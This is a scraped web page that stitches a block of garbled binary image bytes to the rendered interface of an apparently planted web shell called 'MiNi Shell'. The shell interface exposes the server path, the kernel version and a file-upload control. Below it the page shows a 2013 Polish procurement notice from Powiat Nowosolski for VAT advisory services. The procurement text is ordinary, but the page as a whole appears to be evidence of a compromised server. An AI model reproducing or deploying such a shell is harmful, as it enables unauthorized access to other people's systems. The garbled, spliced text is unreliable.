JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/217486-N-2013.html

<p class="kh_header"><b>Nowa Sól: Świadczenie usług doradztwa podatkowego i prawnego, w tym usług zastępstwa procesowego w
postępowaniu o odzyskanie podatku od towarów i usług zapłaconego przez Powiat Nowosolski</b><br>
<b>Numer ogłoszenia: 217486 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosolski , ul. Moniuszki 3B, 67-100 Nowa Sól, woj. lubuskie, tel. 68 4586800, faks 68 4586831.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nowosolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług doradztwa podatkowego i prawnego, w tym usług zastępstwa procesowego w
postępowaniu o odzyskanie podatku od towarów i usług zapłaconego przez Powiat Nowosolski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie o wartości mniejszej niż kwoty określone w przepisach wydanych na podstawie art.11 ust.8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
1. Przedmiotem zamówienia jest świadczenie usług doradztwa prawnego i podatkowego polegających
na przygotowaniu kompleksowej analizy dotyczącej możliwości optymalizacji rozliczeń VAT
dokonywanych przez Zamawiającego oraz usług polegających na zastępstwie procesowym przed
sądami administracyjnymi oraz organami podatkowymi w zakresie rozliczeń podatków od towarów
i usług oraz doradztwie w zakresie przedmiotowego zastępstwa procesowego.
2. Usługi, o których mowa w ust. 1podzielone są na dwie fazy:
1) Fazę wstępną-diagnostyczną - zakończoną pisemnym raportem ;
2) Fazę wdrożeniową - zakończoną odzyskaniem VAT przez Zamawiającego w wyniku czynności
zarekomendowanych przez Wykonawcę, a także czynności podjętych przez Wykonawcę w
imieniu i na rzecz Zamawiającego.
3. FAZA WSTĘPNA - DIAGNOSTYCZNA
Usługi świadczone w ramach fazy wstępnej będą polegać w szczególności na :
1) przeglądzie podstawowych obszarów działalności Zamawiającego oraz jednostek
organizacyjnych Zamawiającego, które mogą przyczynić się do optymalizacji rozliczeń VAT
przez Zamawiającego,
2) identyfikacji możliwości optymalizacji VAT i oceny szans na skuteczne i bezpieczne
przeprowadzenie optymalizacji,
3) sporządzeniu raportu zawierającego ocenę istniejącego stanu rozliczeń VAT oraz
rekomendacje wykonawcy, w szczególności:
a) prezentację możliwych obszarów optymalizacji rozliczeń VAT dokonanych przez
Zamawiającego,
b) wstępne oszacowanie możliwej do odzyskania przez Zamawiającego kwoty VAT,
c) oszacowanie prawdopodobieństwa skutecznego wdrożenia proponowanych rozwiązań
optymalizacyjnych,
d) oszacowanie, zgodnie z najlepszą wiedzą i doświadczeniem zawodowym Wykonawcy,
poziomu ryzyka zakwestionowania przez organy podatkowe zaprezentowanych rozwiązań
optymalizacyjnych,
e) rekomendacje oraz wskazanie praktycznych działań zmierzających do wdrożenia rozwiązań
optymalizacji, w tym zmian w strukturze organizacyjnej Zamawiającego,
f) rekomendacje oraz wskazanie praktycznych działań zmierzających do zminimalizowania
ryzyka zakwestionowania przez organy podatkowe zaprezentowanych i wdrażanych rozwiązań
optymalizacyjnych.
4. FAZA WDROŻENIOWA
1) Faza wdrożeniowa polega na zrealizowaniu oszczędności we wskazanych w raporcie obszarach
rozliczeń VAT dokonywanych przez Zamawiającego , tj. na odzyskaniu kwot podatku VAT w tym
w drodze postępowania podatkowego lub sądowo-administracyjnego.
2) Zakres fazy wdrożeniowej zostanie szczegółowo ustalony po zakończeniu fazy wstępnej
zgodnie z potrzebami i oczekiwaniami Zamawiającego.
3) Zamawiający w formie pisemnej, w terminie uzgodnionym z Wykonawcą, poinformuje czy
akceptuje rekomendacje Wykonawcy przedstawione w raporcie, o którym mowa w §3 pkt 3 w
całości, w części czy też całkowicie rezygnuje z fazy wdrożeniowej.
4) Strony przystąpią do ewentualnej realizacji fazy wdrożeniowej w uzgodnionym terminie.
5) Usługi świadczone w ramach fazy wdrożeniowej będą polegać w szczególności na :
3
a) przygotowaniu korekt przeszłych rozliczeń VAT oraz przygotowaniu bieżących i przyszłych
rozliczeń VAT,
b) przygotowaniu wniosków o indywidualne interpretacje prawa podatkowego,
c) reprezentowaniu Zamawiającego na podstawie udzielonego pełnomocnictwa, w postępowaniu
o wydanie indywidualnej interpretacji prawa podatkowego lub postępowaniu o stwierdzeniu
nadpłaty przed organami podatkowymi i sądami administracyjnymi,
d) reprezentowanie Zamawiającego przed organami podatkowymi oraz sądami
administracyjnymi w celu obrony stanowiska zamawiającego bezpośrednio wynikającego ze
złożonych wniosków dotyczących rozliczeń podatków VAT oraz związanych z wdrożeniem
rekomendacji Wykonawcy;
e) Jeżeli uzyskane przez Zamawiającego kwoty podatku VAT, wynikające z zastosowania się do
rekomendacji Wykonawcy zgodnie z niniejszą umową zostaną w przyszłości kwestionowane przez
organy podatkowe, Wykonawca zobowiązany będzie do reprezentowania Zamawiającego w
toczących się postępowaniach podatkowych, bez względu na okres czasu, kiedy organy
podatkowe zakwestionują wdrożone rozwiązania oraz do realizacji wszelkich czynności zgodnie z
niniejsza umową, a wynikających z tych postanowień.
5. UWAGI KOŃCOWE:
1) Przedmiot zamówienia obejmuje zdarzenia i transakcje Zamawiającego, które:
a) miały miejsce w przeszłości,
b) są dokonywane obecnie,
c) będą realizowane w budżecie obecnym oraz przyszłym,
d) inne przyszłe zdarzenia, o ile takie żądanie zgłosi Zamawiający w trakcie trwania umowy
na realizacje przedmiotowej umowy.
2) Zastosowanie wskazanych przez Wykonawcę rozwiązań w ramach fazy optymalizacyjnej będzie
każdorazowo wymagało zgody Zamawiającego. Zamawiający może podjąć decyzję o:
a) pełnej akceptacji rekomendacji Wykonawcy,
b) akceptacji jedynie wybranych rekomendacji,
c) zawieszeniu realizacji fazy optymalizacyjnej,
d) rezygnacji z realizacji fazy optymalizacyjnej;
3) W sytuacji określonej w pkt 2) lit. d) umowa ulega rozwiązaniu.
4) Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy zawiera załącznik nr 7
do SIWZ.
5) Oznaczenie wg Wspólnego Słownika Zamówień (CPV) :
79.22.10.00-9 usługi w zakresie doradztwa podatkowego; 79.11.00.00-8 usługi w zakresie doradztwa
prawnego i reprezentacji prawnej; 79.22.20.00-6 usługi przygotowawcze do zwrotu podatku.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.22.10.00-9, 79.11.00.00-8, 79.22.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na
podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
- warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, że posiada doświadczenie
wyrażające się tym, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli
okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie minimum dwie usługi
doradztwa podatkowego w zakresie odzyskania podatku VAT , zakończone złożeniem wniosku do
organu podatkowego lub sądów administracyjnych o zwrot podatku VAT.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
warunek ten zostanie uznany za spełniony, jeżeli wykonawca dysponuje zespołem składającym się z
co najmniej:
- 1(jedną) osobą uprawnioną do zawodowego wykonywania usług doradztwa podatkowego zgodnie z
przepisami ustawy z dnia 5 lipca 1996r. o doradztwie podatkowym (t.j Dz.U. z 2011r., Nr 41 poz. 213
ze zm.), z min. 3 letnim doświadczeniem w zakresie doradztwa podatkowego;
- 1 (jednym) radcą prawnym, adwokatem lub prawnikiem zagranicznym, który jest prawnikiem
zagranicznym wykonującym stałą praktykę na podstawie ustawy z dnia 5 lipca 2002 r. o świadczeniu
przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej, z min. 3 letnim
doświadczeniem w zakresie doradztwa prawnego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na
podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>należy wykazać minimum dwie usługi doradztwa podatkowego w zakresie odzyskania podatku VAT , zakończone złożeniem wniosku do organu podatkowego lub sądów administracyjnych o zwrot podatku VAT.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o informacje
zawarte w dokumentach i oświadczeniach złożonych przez wykonawcę wraz z ofertą w niniejszym
postępowaniu. Ocena warunków będzie odbywać się poprzez stwierdzenie : spełnia / nie spełnia.
W przypadku niejasności, co do treści złożonych dokumentów Zamawiający wezwie Wykonawców do
złożenia wyjaśnień dotyczących oświadczeń lub dokumentów potwierdzających spełnianie warunków
udziału w postępowaniu.
Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych oświadczeń
lub dokumentów, o których mowa w art. 25 ust.1 ustawy Pzp, lub którzy nie złożyli pełnomocnictw, albo
którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25
ust.1, zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym
terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby
unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny
potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w
którym upłynął termin składania ofert .
1.Dokumenty wymagane w ofercie:
1) wypełniony Formularz oferty - sporządzony wg wzoru załącznik nr 1 do SIWZ;
2) oświadczenie Wykonawcy o spełnieniu warunków udziału określonych w art.22 ust.1 -
sporządzony wg wzoru załącznik nr 2 do SIWZ;
3) oświadczenie Wykonawcy o braku podstaw do wykluczenia na podstawie art.24 ust.1 i 2 -
sporządzony wg wzoru załącznik nr 3, nr 3 A do SIWZ;
4) Informacja o przynależności do grupy kapitałowej - sporządzony wg wzoru załącznik nr 4 do
SIWZ;
5) podpisany formularz istotnych postanowień umowy - sporządzony wg wzoru załącznik nr 7 do
SIWZ;
6) pełnomocnictwo do złożenia oferty - w przypadku, gdy prawo do podpisania oferty nie wynika z
przepisów prawa lub z dokumentów rejestrowych złożonych wraz z ofertą. Pełnomocnictwo należy
złożyć w oryginale lub notarialnie poświadczonej kopii;
7) pozostałe oświadczenia i dokumenty, o których mowa w ust. XIV SIWZ.
Uwaga:
Zamawiającemu przysługuje prawo do żądania przedstawienia oryginału dokumentu lub jego kopii
poświadczonej notarialnie w sytuacji, gdy złożona przez Wykonawcę kopia dokumentu jest
nieczytelna lub budzi wątpliwości co do jej autentyczności.
W przypadku, gdy wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust.
1 ustawy pzp polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b
ustawy, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić
zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając
w tym celu:
1) pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres
korzystania z nich przy wykonaniu zamówienia (należy złożyć oświadczenie w oryginale) oraz
dokumenty zawierające informacje dotyczące:
a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy zawiera załącznik nr 7 do
SIWZ. Strony dopuszczają możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty,
na podstawie której dokonano wyboru wykonawcy na zasadach określonych w załączniku nr 7 do SIWZ,
w tym:
1) Zamawiający przewiduje możliwość zmiany niniejszej umowy w zakresie okresu realizacji w
przypadku, gdy postępowania administracyjne i sądowe nie zakończą się przed terminem
wskazanym w ust. 1, do czasu ostatecznego rozstrzygnięcia postępowań podatkowych
toczących się przed organami podatkowymi oraz do czasu prawomocnego zakończenia
postepowań sądowo administracyjnych oraz innych ewentualnych postępowań przed innymi
sądami i organami oraz do czasu wykonania przez Wykonawcę wszelkich czynności
objętych niniejszą umową, a wynikających z tych rozstrzygnięć.
2) Zamawiający przewiduje możliwość zmiany niniejszej umowy w zakresie okresu realizacji w
przypadku zawieszenia fazy wdrożeniowej, poprzez wydłużenie okresu trwania niniejszej
umowy przez okres zawieszenia realizacji fazy wdrożeniowej.
3) Zamawiający może podjąć decyzję o:
a) pełnej akceptacji rekomendacji Wykonawcy,
b) akceptacji jedynie wybranych rekomendacji,
c) zawieszeniu realizacji fazy wdrożeniowej.
d) rezygnacji z realizacji fazy, wdrożeniowej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-nowosolski.pl  zakładka : zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe,67-100 Nowa Sól, ul. Moniuszki 3b ,pok.201..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2013 godzina 09:00, miejsce: Powiat Nowosolski z siedzibą Starostwa Powiatowego,
Ul. Moniuszki 3b, 67-100 Nowa Sól,
Sekretariat - I piętro - pok.109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com